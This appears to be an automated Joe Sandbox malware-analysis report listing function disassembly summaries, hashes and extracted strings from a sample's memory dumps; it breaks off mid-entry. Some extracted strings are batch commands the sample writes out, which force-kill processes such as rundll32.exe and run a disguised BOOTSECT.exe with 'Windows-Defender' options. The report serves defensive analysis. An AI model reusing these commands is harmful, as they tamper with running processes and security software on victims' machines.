Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$Windowlstrlen$CloseCreateFolderForegroundHandleLocalPathPointerSizeSpecialTextTimeWritewsprintf
String ID:
API String ID: 3540613261-0
Opcode ID: bbe578f14ee8d9d3539762c7f5ed09d4090325bc30e383507499883546d90b90
Instruction ID: c225f7927e1ac5b90bfbd81630177ba0d139a3e7f0f1cc8ba8b87bc3e09df293
Opcode Fuzzy Hash: bbe578f14ee8d9d3539762c7f5ed09d4090325bc30e383507499883546d90b90
Instruction Fuzzy Hash: F331A8F6A002156BEB24C754EC46FE97778EF44304F1481F4F70CB6285EB34AA998A6D

Function 004340A0 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004340AC

Part of subcall function 00432345: __getptd_noexit.LIBCMT ref: 00432348
Part of subcall function 00432345: __amsg_exit.LIBCMT ref: 00432355

__amsg_exit.LIBCMT ref: 004340CC
__lock.LIBCMT ref: 004340DC
InterlockedDecrement.KERNEL32(?), ref: 004340F9
InterlockedIncrement.KERNEL32(02232C68), ref: 00434124

Memory Dump Source

Source File: 00000007.00000002.3502605528.0000000000431000.00000020.00000001.01000000.00000009.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.3502562365.0000000000430000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502638996.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502674482.000000000043A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502714188.000000000043C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_lXAMaI.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 55057f25e72764982571092549e9a0114b12ea0bd0fdfca1f234868c38512d3e
Instruction ID: 7b6076f4ab705c1d40b87f9ebd73a63e8c31fcef69272590f6f897ac953a9411
Opcode Fuzzy Hash: 55057f25e72764982571092549e9a0114b12ea0bd0fdfca1f234868c38512d3e
Instruction Fuzzy Hash: D501E531901A11A7CB15AF25840A38EB360BF4C710F11601BE90073291CB7C7D91CB9D

Function 004335EE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0043360C

Part of subcall function 00432AA0: __mtinitlocknum.LIBCMT ref: 00432AB6
Part of subcall function 00432AA0: __amsg_exit.LIBCMT ref: 00432AC2
Part of subcall function 00432AA0: EnterCriticalSection.KERNEL32(?,?,?,00435600,00000004,00439628,0000000C,00433746,?,?,00000000,00000000,00000000,?,004322F7,00000001), ref: 00432ACA

___sbh_find_block.LIBCMT ref: 00433617
___sbh_free_block.LIBCMT ref: 00433626
HeapFree.KERNEL32(00000000,?,00439568,0000000C,00432A81,00000000,004394C8,0000000C,00432ABB,?,?,?,00435600,00000004,00439628,0000000C), ref: 00433656
GetLastError.KERNEL32(?,00435600,00000004,00439628,0000000C,00433746,?,?,00000000,00000000,00000000,?,004322F7,00000001,00000214), ref: 00433667

Memory Dump Source

Source File: 00000007.00000002.3502605528.0000000000431000.00000020.00000001.01000000.00000009.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.3502562365.0000000000430000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502638996.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502674482.000000000043A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502714188.000000000043C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_lXAMaI.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: edf6709c415fbd43f5d570f19b84bfc85aa5f21533148ad7e3db42de57190424
Instruction ID: e65223e67bb2af50a4076f305062ae862731fdc3b9806a25cae61e6041ba29fb
Opcode Fuzzy Hash: edf6709c415fbd43f5d570f19b84bfc85aa5f21533148ad7e3db42de57190424
Instruction Fuzzy Hash: DB014F71D04305BEDB306F729D07B9E7664AF19765F60701FF540A6292CA7C8A808A9D

Function 1002425D Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

OpenPrinterA.WINSPOOL.DRV(?,?), ref: 10024265
DocumentPropertiesA.WINSPOOL.DRV(?,?,?,?,?,?,?,?), ref: 10024288
GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?), ref: 10024290
DocumentPropertiesA.WINSPOOL.DRV(?,?,?,00000000,?,00000002,?,?,?,?,?,?,?,?), ref: 100242AA
ClosePrinter.WINSPOOL.DRV(?,?,?,?,00000000,?,00000002,?,?,?,?,?,?,?,?), ref: 100242C8

Part of subcall function 100244EC: GlobalFlags.KERNEL32(?), ref: 100244F6
Part of subcall function 100244EC: GlobalUnlock.KERNEL32(?), ref: 1002450D
Part of subcall function 100244EC: GlobalFree.KERNEL32(?), ref: 10024518

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Global$DocumentProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlock
String ID:
API String ID: 2794724741-0
Opcode ID: 678b138961e3f78d96bf53481868ae7991fb654cc4e925a0b1b875e3d7086c8d
Instruction ID: 242fbe9b8669229da20748b50ecb72d5155660cfde23eda121fab49a12f5b5d6
Opcode Fuzzy Hash: 678b138961e3f78d96bf53481868ae7991fb654cc4e925a0b1b875e3d7086c8d
Instruction Fuzzy Hash: DEF0FF79500108BAEB22EBF5DD46EAF7EBEEF85740F914419F60999022CB31DA51E720

Function 100150A1 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,10016452,100163D7,00000000,100136C1,00000000,?,?,?,100107FA,?,?,10010760,?,?), ref: 100150A3
TlsGetValue.KERNEL32(?,?,?,100107FA,?,?,10010760,?,?,?), ref: 100150B1
SetLastError.KERNEL32(00000000,?,?,?,100107FA,?,?,10010760,?,?,?), ref: 100150FD

Part of subcall function 1001864D: HeapAlloc.KERNEL32(00000008,100107FA,00000000,?,?,?,?,?,100107FA,?,?,10010760,?,?,?), ref: 10018743

TlsSetValue.KERNEL32(00000000,?,?,?,100107FA,?,?,10010760,?,?,?), ref: 100150D5
GetCurrentThreadId.KERNEL32 ref: 100150E6

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: d13984865d3f9214633b5497863bc709c09767a20dffb2d482fb6f848bbce806
Instruction ID: dffb80e80ef887436b94933429d619e8b860ff5914052723c4aa74364073ef3f
Opcode Fuzzy Hash: d13984865d3f9214633b5497863bc709c09767a20dffb2d482fb6f848bbce806
Instruction Fuzzy Hash: E9F09635601632DFE3329BA49C4951E3B54FF057A2B250619F955DE190DF71C88186A0

Function 10015288 Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,?,?,10015075,1001398C,100139E5,?,?,?), ref: 100152BC

Part of subcall function 10013574: HeapFree.KERNEL32(00000000,?,00000000,100107FA,00000000,?,10018703,00000009,00000000,?,?,?,?,?,100107FA,?), ref: 10013648

DeleteCriticalSection.KERNEL32(?,?,10015075,1001398C,100139E5,?,?,?), ref: 100152D7
DeleteCriticalSection.KERNEL32 ref: 100152DF
DeleteCriticalSection.KERNEL32 ref: 100152E7
DeleteCriticalSection.KERNEL32 ref: 100152EF

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CriticalDeleteSection$FreeHeap
String ID:
API String ID: 447823528-0
Opcode ID: dd5121e98b8897d9568486e05bfd06f6487200d3970ed85887637a281623a9e0
Instruction ID: 3e2fe80080aa1be9f73322ff581c7217310a8c7d74c27f2966d11604b3c52b0d
Opcode Fuzzy Hash: dd5121e98b8897d9568486e05bfd06f6487200d3970ed85887637a281623a9e0
Instruction Fuzzy Hash: 2FF05423900BA0AADB70F71EDC8885F7E55DBC235135B0075F8816E071D536EC998D50

Function 1002565B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 10025667
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10025716
LoadBitmapA.USER32(00000000,00007FE3), ref: 1002572E

Strings

, xrefs: 10025676

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: f7e95be7fc5b2ac8b23356c04f1dafc0976659aad6b6ba40e074a13c93d399e4
Instruction ID: 0f261cb5b1a5710858b7daf53ba995484ae8434917bf4fab70bb1bd74e35f638
Opcode Fuzzy Hash: f7e95be7fc5b2ac8b23356c04f1dafc0976659aad6b6ba40e074a13c93d399e4
Instruction Fuzzy Hash: 13213771E00325AFEB10CF78DCC9BAD7BB8EB40711F5541A5E90AEB2C1D6719A458B90

Function 10005CFA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10005D2B
ShellExecuteExA.SHELL32(0000003C), ref: 10005DC1
ExitProcess.KERNEL32 ref: 10005DCD

Strings

<, xrefs: 10005D81

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ExecuteExitFileModuleNameProcessShell
String ID: <
API String ID: 1425974386-4251816714
Opcode ID: 063d84c36f2c2cafd93c2c702be78e40d38f34d675d44c767cbbc08800c8f742
Instruction ID: f9506b816e97f84dd2a58ee61782e996dac12f38d084ea4e830c28ae155ca55b
Opcode Fuzzy Hash: 063d84c36f2c2cafd93c2c702be78e40d38f34d675d44c767cbbc08800c8f742
Instruction Fuzzy Hash: C81163719002199BFB20DB24CD597DAB7B5EB58341F0004EAD60DA6290DBB55B88CF51

Function 10003A13 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 10003A30
WriteFile.KERNEL32(000000FF,@echo off 2>nul 3>nultaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im iXXX3XXX.exe /fAttrib C:\xxxx.INST.INI -,00000874,?,00000000), ref: 10003A57
CloseHandle.KERNEL32(000000FF), ref: 10003A69

Strings

@echo off 2>nul 3>nultaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im iXXX3XXX.exe /fAttrib C:\xxxx.INST.INI -, xrefs: 10003A4E

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: @echo off 2>nul 3>nultaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im iXXX3XXX.exe /fAttrib C:\xxxx.INST.INI -
API String ID: 1065093856-2435315943
Opcode ID: 1367524b182bdc4ab9e64c3a8d1ea78060334af85559c8674577db42e2da68b9
Instruction ID: 76b812eec422c1cdf8b7faa08b4a15a24fc16fc04e6fa58d54d983f2d0926bae
Opcode Fuzzy Hash: 1367524b182bdc4ab9e64c3a8d1ea78060334af85559c8674577db42e2da68b9
Instruction Fuzzy Hash: 82F06D34E44348FBFB10DBA48C4AFCE7BB8AB05B04F2482C4F6546B2C1D7B4AA059B55

Function 10003A76 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(10002209,40000000,00000001,00000000,00000002,00000000,00000000,?,10002209), ref: 10003A93
WriteFile.KERNEL32(000000FF,C:\\xxx.exe,0000000B,10002209,00000000), ref: 10003AB7
CloseHandle.KERNEL32(000000FF), ref: 10003AC9

Strings

C:\\xxx.exe, xrefs: 10003AAE

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\\xxx.exe
API String ID: 1065093856-3901261081
Opcode ID: 5c7b80f312bb957845d791b00e48c9ccf0d2810337b54b180e0254f5e6a6b046
Instruction ID: 692b6972c6764c21128f5387f43884c02dc68f317e04c88635a77b6f45907233
Opcode Fuzzy Hash: 5c7b80f312bb957845d791b00e48c9ccf0d2810337b54b180e0254f5e6a6b046
Instruction Fuzzy Hash: DEF06D34E40348FBFB10DBA48D4AFCE7BB8AB05704F248184F7546B2C0D7B46A049B55

Function 1000CE3E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 1000CE5B
WriteFile.KERNEL32(000000FF,@echo off 2>nul 3>nultaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im iXXX3XXX.exe /fAttrib C:\xxxx.INST.INI -,00000874,?,00000000), ref: 1000CE82
CloseHandle.KERNEL32(000000FF), ref: 1000CE94

Strings

@echo off 2>nul 3>nultaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im iXXX3XXX.exe /fAttrib C:\xxxx.INST.INI -, xrefs: 1000CE79

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: @echo off 2>nul 3>nultaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill /im iXXX3XXX.exe /ftaskkill /im iXXX3XXX.exe /fAttrib C:\xxxx.INST.INI -
API String ID: 1065093856-2435315943
Opcode ID: 1367524b182bdc4ab9e64c3a8d1ea78060334af85559c8674577db42e2da68b9
Instruction ID: 3da6f8972f13a0c701eb52423c89e78fcd13ad3206da8dee124fc34b437c3e95
Opcode Fuzzy Hash: 1367524b182bdc4ab9e64c3a8d1ea78060334af85559c8674577db42e2da68b9
Instruction Fuzzy Hash: 5FF04934A40348FAEB10DBA4CC4AFCD7BB8AB04B04F248284F6546B2C0D7B4AA059B54

Function 1000CF04 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 1000CF21
WriteFile.KERNEL32(000000FF,C:\\xxx.exe,0000000B,?,00000000), ref: 1000CF45
CloseHandle.KERNEL32(000000FF), ref: 1000CF57

Strings

C:\\xxx.exe, xrefs: 1000CF3C

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\\xxx.exe
API String ID: 1065093856-3901261081
Opcode ID: 5c7b80f312bb957845d791b00e48c9ccf0d2810337b54b180e0254f5e6a6b046
Instruction ID: c0b96c2b09f2e046114ecb88b63ec29f3884d99056b0cd500b5e2a4ecf29741e
Opcode Fuzzy Hash: 5c7b80f312bb957845d791b00e48c9ccf0d2810337b54b180e0254f5e6a6b046
Instruction Fuzzy Hash: EBF06D34E40348FBFB10DBA48C4AFDE7BB8AB04704F248194F7586B2C0C7B46A059B95

Function 1000CF64 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 1000CF81
WriteFile.KERNEL32(000000FF,@echo offcd /d "%~dp0"echo Uninstalling ...CLSC:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /lC:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /rC:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /lecho It should be uninstalle,000001A0,?,00000000), ref: 1000CFA8
CloseHandle.KERNEL32(000000FF), ref: 1000CFBA

Strings

@echo offcd /d "%~dp0"echo Uninstalling ...CLSC:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /lC:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /rC:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /lecho It should be uninstalle, xrefs: 1000CF9F

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: @echo offcd /d "%~dp0"echo Uninstalling ...CLSC:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /lC:\ProgramData\Microsoft\eHome\BOOTSECT.exe /o /c "Windows-Defender" /rC:\ProgramData\Microsoft\eHome\BOOTSECT.exe /h /o /lecho It should be uninstalle
API String ID: 1065093856-1169150221
Opcode ID: 673ab9c7e46ce86de37f12dad250da3668a3fa70c5eeac61bb6b3963a6c594e9
Instruction ID: 01ea76d96ccdc10bd5a8d76f08adec36564800aed4164fe096450972fd590385
Opcode Fuzzy Hash: 673ab9c7e46ce86de37f12dad250da3668a3fa70c5eeac61bb6b3963a6c594e9
Instruction Fuzzy Hash: 34F04934A40349FBFB10CBA4CD4AFDDBBB8AB04704F248294F654AB2C0D7B46A059B59

Function 035A3164 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,035A3115,00000000,?,00000001,?,?,?,035A3204,00000001,FlsFree,035B3BE0,FlsFree), ref: 035A3171
GetLastError.KERNEL32(?,035A3115,00000000,?,00000001,?,?,?,035A3204,00000001,FlsFree,035B3BE0,FlsFree,00000000,?,035A26E1), ref: 035A317B
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 035A31A3

Strings

api-ms-, xrefs: 035A3188

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 525b72304fe1ebf6ce6bb846a599608e5ea30030d07d5f62c14f5a42a7b2d099
Instruction ID: 3396278c3ea881c32c4eec63b435bc786eba7e6f7ad746efde0e008fdcdac923
Opcode Fuzzy Hash: 525b72304fe1ebf6ce6bb846a599608e5ea30030d07d5f62c14f5a42a7b2d099
Instruction Fuzzy Hash: 6EE01A38680748BBEF10AAA4FC46F6D3A69BF00A55F248460F94CF80B5EB71A415A544

Function 100243BC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 100243CD
GetClassNameA.USER32(00000000,?,0000000A), ref: 100243E8
lstrcmpiA.KERNEL32(?,combobox), ref: 100243F7

Strings

combobox, xrefs: 100243F1

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: 63e5e38b6e6663d56bba2b1dcbdf71619e4107ade2efbe4e37c0de67d3087152
Instruction ID: 44f351238b47896d15260f78e49ce7490ff12fb97501276f76c63fe56323182c
